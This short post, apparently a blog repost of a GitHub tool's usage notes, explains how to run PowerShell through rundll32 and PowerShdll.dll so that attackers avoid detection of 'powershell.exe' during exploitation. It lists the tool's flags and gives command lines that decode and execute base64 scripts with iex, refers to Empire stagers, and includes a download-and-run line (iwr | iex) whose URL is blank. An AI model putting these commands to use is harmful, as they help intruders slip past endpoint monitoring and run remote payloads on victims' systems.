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Using powershell without powershell.exe

Ever wondered how to evade "powershell.exe" during exploitations?

Well use thze powershell.ddll instead.

p3nt4 gives some advice on his github page.

dll mode: Rundll32:

rundll32 PowerShdll,main <script>
rundll32 PowerShdll,main -h      Display this message
rundll32 PowerShdll,main -f <path>       Run the script passed as argument
rundll32 PowerShdll,main -w      Start an interactive console in a new window (Default)
rundll32 PowerShdll,main -i      Start an interactive console in this console
If you do not have an interractive console, use -n to avoid crashes on output
ExamplesRun base64 encoded script
rundll32 Powershdll.dll,main [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String("BASE64")) ^| iex

Note: Empire stagers need to be decoded using [System.Text.Encoding]::Unicode

Download and run script
rundll32 PowerShdll.dll,main . { iwr -useb } ^| iex;